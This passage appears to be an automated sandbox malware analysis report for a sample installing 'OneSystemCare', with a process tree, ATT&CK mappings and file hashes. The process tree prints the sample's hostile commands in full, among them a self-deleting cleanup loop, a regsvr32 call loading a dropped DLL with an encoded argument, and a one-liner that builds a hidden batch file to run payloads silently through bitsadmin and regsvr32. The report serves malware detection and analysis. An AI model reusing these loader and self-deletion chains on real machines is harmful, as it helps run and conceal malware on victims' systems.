    cmd /c for /l %x in (1, 1, 2) do del /Q "C:\Users\Admin\AppData\Local\Temp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.exe" & timeout /t 5
    3⤵
    PID:4248
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:1900
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:4340
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c for /l %x in (1, 1, 2) do rmdir /S /Q "C:\Users\Admin\AppData\Local\Temp\is-F9E7J.tmp" & timeout /t 5
    3⤵
    PID:3740
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:4412
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:932

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:116
- C:\Windows\SysWOW64\regsvr32.exe
  "C:\Windows\SysWOW64\regsvr32.exe" "C:\Users\Admin\AppData\Local\Temp\is-PB8UD.tmp\jeuppxd.dll" /i /n /s:"$$f9goa1TR9Q3SD_0Hj8HZKhmCeYSFH0mLD38neR70VtfdYLgNqA2BKWB9ia7T04OAvQxt7EagyWATBR9rz0n1wBAGd4ywsLgF2Cwnag-G2oqohlbJv1BJnzidZs8MBH741wrkLm0fpvpEKcCA8QUXWJNhf0HnaJncP7FjrJnYjjTu0MoZBtUkTWe0EIa-wX-sfqtMJP80z9dMgUgpkjWyo_dGnQ1T2BQBEndW57BSD4ozvsoBDOOfFZ_NTmxnHMu13w_3F_BiJktxWxrt_JCE1UGGEAbGINWeE_Y_ZxhNCyZ46oBtWN_sEnGGyYR7f-wXf2pQXK0SpfX9Bpk5-3wgBLc_kTelzGTnKUr2gVjUUFTBik-qaiEX_gGpdeviIdrgcsmu6T2w3L-dQtOG-mXgmurWJ1jspIg30bPpkn6EDq_IP9-QQuRhVEJ6ZsPLtOhtYHMTxYLJ0UROH8Eiah_RmKm_8I062JCASbsDGiH4fu0j6b99GWZ-CsqiDB0XaZZk1BhnajkV86px3SU4rLsLeR09GzNskpVi76NF9RxpqDrN01Akd8e0WcrqMi1W_MPaO4BiEX6enI690upWM_A11H_97TxzWmzVV6jKNWtEQZoHmJEL65jlZ8k2WklisPxnP14XXfSmCZTubpS5VKCHLJjrzK0LT1jwvJMs8q_j0-wTSgudwj5z805FzEJTH5CvNR2C-YVp-WX9wmQhMbMt4DLBdpwEpbWF9ScquIAkw1zlb2lEXCtQqt5nOL0cXKCZ0wPH2_X4hG1xdvBC-BjwZRKxOVj_$$"
  2⤵
  - Windows security bypass
  - Loads dropped DLL
  PID:880

C:\Windows\system32\cmd.exe
"cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & echo bitsadmin /complete {06939883-5E96-9F8C-EE43-0F13EEA45642} ^> nul >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & echo bitsadmin /cancel {06939883-5E96-9F8C-EE43-0F13EEA45642} ^> nul >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & echo if exist "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\{06939883-5E96-9F8C-EE43-0F13EEA45642}.tmp" goto q >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"" "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\%i" >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat")) > nul & echo :q >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"" "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\{06939883-5E96-9F8C-EE43-0F13EEA45642}.tmp" >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & echo del "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" ^& exit >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat""
1⤵
- Suspicious use of WriteProcessMemory
PID:640
- C:\Windows\system32\cmd.exe
  cmd /c "(echo @echo off > "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & echo bitsadmin /complete {06939883-5E96-9F8C-EE43-0F13EEA45642} ^> nul >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & echo bitsadmin /cancel {06939883-5E96-9F8C-EE43-0F13EEA45642} ^> nul >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & echo if exist "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\{06939883-5E96-9F8C-EE43-0F13EEA45642}.tmp" goto q >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"" "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\%i" >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat")) > nul & echo :q >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"" "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\{06939883-5E96-9F8C-EE43-0F13EEA45642}.tmp" >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & echo del "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" ^& exit >> "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat" & "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /a:-d /b /w "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\*.tmp"
    3⤵
    PID:1304
- - C:\Windows\system32\bitsadmin.exe
    bitsadmin /complete {06939883-5E96-9F8C-EE43-0F13EEA45642}
    3⤵
    PID:5056
- - C:\Windows\system32\bitsadmin.exe
    bitsadmin /cancel {06939883-5E96-9F8C-EE43-0F13EEA45642}
    3⤵
    PID:5024
- - C:\Windows\system32\regsvr32.exe
    regsvr32.exe /s /n /i:"" "C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\{06939883-5E96-9F8C-EE43-0F13EEA45642}.tmp"
    3⤵
    PID:1972

C:\Windows\system32\cmd.exe
"cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & echo bitsadmin /complete {D69C0D5C-CB49-4F83-31D6-00C331315992} ^> nul >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & echo bitsadmin /cancel {D69C0D5C-CB49-4F83-31D6-00C331315992} ^> nul >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & echo if exist "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\{D69C0D5C-CB49-4F83-31D6-00C331315992}.tmp" goto q >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"" "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\%i" >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat")) > nul & echo :q >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"" "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\{D69C0D5C-CB49-4F83-31D6-00C331315992}.tmp" >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & echo del "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" ^& exit >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat""
1⤵
- Suspicious use of WriteProcessMemory
PID:3484
- C:\Windows\system32\cmd.exe
  cmd /c "(echo @echo off > "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & echo bitsadmin /complete {D69C0D5C-CB49-4F83-31D6-00C331315992} ^> nul >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & echo bitsadmin /cancel {D69C0D5C-CB49-4F83-31D6-00C331315992} ^> nul >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & echo if exist "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\{D69C0D5C-CB49-4F83-31D6-00C331315992}.tmp" goto q >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"" "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\%i" >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat")) > nul & echo :q >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"" "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\{D69C0D5C-CB49-4F83-31D6-00C331315992}.tmp" >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & echo del "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" ^& exit >> "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat" & "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir /a:-d /b /w "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\*.tmp"
    3⤵
    PID:3176
- - C:\Windows\system32\bitsadmin.exe
    bitsadmin /complete {D69C0D5C-CB49-4F83-31D6-00C331315992}
    3⤵
    PID:2728
- - C:\Windows\system32\bitsadmin.exe
    bitsadmin /cancel {D69C0D5C-CB49-4F83-31D6-00C331315992}
    3⤵
    PID:3728
- - C:\Windows\system32\regsvr32.exe
    regsvr32.exe /s /n /i:"" "C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\{D69C0D5C-CB49-4F83-31D6-00C331315992}.tmp"
    3⤵
    PID:2148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe

Filesize
3.9MB

MD5
362fe21f391c036344a6df31e636173b

SHA1
ebaf2cf61fcbc107d219f21c8b8ac0062834fa17

SHA256
88a5579cfd228fed80a413dc32573b9cc3c1eb2684636a56a43683a83b8e0641

SHA512
b0d2ee4d95df50481a0408faa7106c91b00acb31782eac55b40bb6e92647a6eee6e5d1e4be5f4195ee9f8aa18285556f9c15bc354c91032d3a66e37958c3a601

Download Submit
C:\Program Files (x86)\OneSystemCare\unins000.dat

Filesize
29KB

MD5
1d95ad7160eef42bb2dada1d71e017e1

SHA1
63e0d769c610b60aefdd91b69b315eb64eb129e7

SHA256
bdb714ed419d077eaf4cce3a05cac097710fb2754689005aa16f6a5bb3a7b459

SHA512
b5dd0ad065d48cf91ffacb75b8b5a7c395ebddfaaab38a8d532779fec47491b2b3abca098aa8539939497ed995367865b95f224bdbfa449d18cbb6e9a472a17f

Download Submit
C:\Program Files (x86)\OneSystemCare\unins000.exe

Filesize
1.2MB

MD5
69ef5d80ad8e5101d8cb0341719e505d

SHA1
8eaf966b739307d9da0e126bd68d4f534c201ba5

SHA256
dd0a11b1edd470c707dc0c011a75bfa8dfec9bd947931f4e592aad5b2f729b12

SHA512
dd59b0d0b0cb2f460b55088e6af449db10a1cb813cf68b013257c75b8ba640fb39d26f25337a5db89970ae8a5f97554fb9f072a3e3a662feca559b263c57ea1d

Download Submit
C:\ProgramData\{06939883-5E96-9F8C-EE43-0F13EEA45642}\x.bat

Filesize
597B

MD5
49f255f0fefdeedf816afb5515e7354f

SHA1
6b416ba27490455c1806b48a88348faf0e9c1a48

SHA256
117c241ec7bdc69e9abe7a65b94c02f3dbea558bb8f878891f8cdb022d5bcd00

SHA512
1cba59ad305f78fd561a966bc62722875d636307ea2d380dca4f68695b841595c6f4e66c3a183219f75c641524bcb79f008b8006bbf56a1cd942e1595b862ccc

Download Submit
C:\ProgramData\{D69C0D5C-CB49-4F83-31D6-00C331315992}\x.bat

Filesize
597B

MD5
8c054146e50513ba09704e0c90a0412c

SHA1
2197b10911c5215aad0d72c023585f2f9a47a430

SHA256
a30c238a29ce82a3f69c9af8d0f17557b6c281451e110f1d1f0879524521e327

SHA512
419628e5b7e54b453f217992c8145db73af6a2a05580aac997e764a19ea040b0f1b6ffd869d189876f24d9b87bc74ca97abd388cbe46a294462df6164571cce7

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-9IHPL.tmp\8cbee6c1397062bb1628450c5ec910c0_JaffaCakes118.tmp

Filesize
1.2MB

MD5
81be2a7b1a680a7bec1560dc9f805709

SHA1
bae1c4f87394afbf0c65501847d3a132651bd4d1

SHA256
4ff8736ec2712cd087ee4b10c05f40802b8485ee26952da63dd97a15f307c6fb

SHA512
d640d93e832e563634c388eda3e9c0271f70ba99866eac276f72cbb4a9341d5891ed2e407d4de50ca61c1d5a3dec4c90b063f2738fe8d8d8dbab35102b20e02b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-F9E7J.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-F9E7J.tmp\_isetup\_setup64.tmp

Filesize
6KB

MD5
e4211d6d009757c078a9fac7ff4f03d4

SHA1
019cd56ba687d39d12d4b13991c9a42ea6ba03da

SHA256
388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95

SHA512
17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-F9E7J.tmp\jeuppxd.dll

Filesize
1.5MB

MD5
d6549de9c10aaa22bac81357b2993bbe

SHA1
3f23bf59919c327316db7a49a89338540d2a8ae0

SHA256
d4b51e5703a4ebcdd34a37ebf3cd516ee5c8456902808470995967059e5d311d

SHA512
4ccf7be9d334fbabcb20094e6fdc2ed4d5aa6f8597d9e4ad08b09de43f52b25ca7f4e3c971ceeea3d1356b0dffa4cc9e86a9f8cbde953c432498390f235a5a5b

Download Submit
memory/880-45-0x00000000743D0000-0x0000000074560000-memory.dmp

Filesize
1.6MB

Download
memory/880-46-0x00000000743D0000-0x0000000074560000-memory.dmp

Filesize
1.6MB

Download
memory/1088-195-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/1088-2-0x0000000000401000-0x0000000000412000-memory.dmp

Filesize
68KB

Download
memory/1088-23-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/1088-0-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/1688-175-0x0000000000400000-0x0000000000534000-memory.dmp

Filesize
1.2MB

Download
memory/2304-47-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2304-27-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2304-189-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2464-170-0x0000000073DB0000-0x0000000073F40000-memory.dmp

Filesize
1.6MB

Download
memory/2464-174-0x0000000000400000-0x0000000000534000-memory.dmp

Filesize
1.2MB

Download
memory/2464-171-0x0000000073DB0000-0x0000000073F40000-memory.dmp

Filesize
1.6MB

Download
memory/3712-39-0x00000000743D0000-0x0000000074560000-memory.dmp

Filesize
1.6MB

Download
memory/3712-48-0x0000000000400000-0x0000000000534000-memory.dmp

Filesize
1.2MB

Download
memory/3712-187-0x0000000000400000-0x0000000000534000-memory.dmp

Filesize
1.2MB

Download
memory/3712-40-0x00000000743D0000-0x0000000074560000-memory.dmp

Filesize
1.6MB

Download
memory/3712-180-0x0000000000400000-0x0000000000534000-memory.dmp

Filesize
1.2MB

Download
memory/4368-182-0x000000003C200000-0x000000003C5F1000-memory.dmp

Filesize
3.9MB

Download
memory/4368-183-0x000000003C200000-0x000000003C5F1000-memory.dmp

Filesize
3.9MB

Download
memory/4368-181-0x000000003C200000-0x000000003C5F1000-memory.dmp

Filesize
3.9MB

Download
memory/4800-19-0x0000000074941000-0x0000000074A5D000-memory.dmp

Filesize
1.1MB

Download
memory/4800-20-0x0000000074940000-0x0000000074AD0000-memory.dmp

Filesize
1.6MB

Download
memory/4800-21-0x0000000074940000-0x0000000074AD0000-memory.dmp

Filesize
1.6MB

Download
memory/4800-22-0x0000000074941000-0x0000000074A5D000-memory.dmp

Filesize
1.1MB

Download
memory/4932-16-0x0000000074940000-0x0000000074AD0000-memory.dmp

Filesize
1.6MB

Download
memory/4932-15-0x0000000074940000-0x0000000074AD0000-memory.dmp

Filesize
1.6MB

Download
memory/4932-24-0x0000000000400000-0x0000000000534000-memory.dmp

Filesize
1.2MB

Download
memory/4932-191-0x0000000000400000-0x0000000000534000-memory.dmp

Filesize
1.2MB

Download
memory/4932-14-0x0000000000400000-0x0000000000534000-memory.dmp

Filesize
1.2MB

Download
memory/4932-6-0x0000000000400000-0x0000000000534000-memory.dmp

Filesize
1.2MB

Download